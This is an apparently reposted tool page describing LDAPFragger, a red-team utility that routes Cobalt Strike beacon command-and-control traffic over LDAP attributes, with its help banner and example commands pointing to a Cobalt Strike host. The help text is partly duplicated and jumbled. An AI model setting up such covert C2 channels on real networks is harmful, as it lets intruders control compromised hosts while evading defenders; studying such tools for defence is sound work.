LDAPFragger - Command And Control Tool That Enables Attackers To Route Cobalt Strike Beacon Data Over LDAP
3 minute read
LDAPFragger is a Command and Control tool that enables attackers to route Cobalt Strike beacon data over LDAP using user attributes.
For background information, read the release blog: http://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes
Dependencies and installation
- Compiled with
.NET 4.0, but may work with older and newer .NET frameworks as well
Usage
Active Directory domain --ldaps: Use LDAPS instead of LDAP -v: Verbose output -h: Display this message If no AD credentials are provided, integrated AD authentication will be used.">
_ _ __ | | | | / _| | | __| | __ _ _ __ | |_ _ __ __ _ __ _ __ _ ___ _ __ | |/ _` |/ _` | '_ \| _| '__/ _` |/ _` |/ _` |/ _ \ '__| | | (_| | (_| | |_) | | | | | (_| | (_| | (_| | __/ | |_|\__,_|\__,_| .__/|_| |_| \__,_|\__, |\__, |\___|_| | | __/ | __/ | |_| |___/ |___/ Fox-IT - Rindert Kramer Usage: --cshost: IP address or hostname of the Cobalt Strike instance --csport: Port of the external C2 interface on the Cobalt Strike server -u: Username to connect to Active Directory -p: Password to connect to Active Directory -d: FQDN of the Active Directory domain --ldaps: Use LDAPS instead of LDAP -v: Verbose output -h: Display this message If no AD credentials are provided, integrated AD authentication will be used. Example usage:
From network segment A, run
LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port> LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port> -u <username> -p <password> -d <domain FQDN> From network segment B, run
LDAPFragger LDAPFragger -u <username> -p <password> -d <domain FQDN> LDAPS can be used with the --LDAPS flag, however, regular LDAP traffic is encrypted as well. Please do note that the default Cobalt Strike payload will get caught by most AVs.
via El pirata de San Jhony
Ad placement
Este artículo esta patrocinado por Woodmex Studio
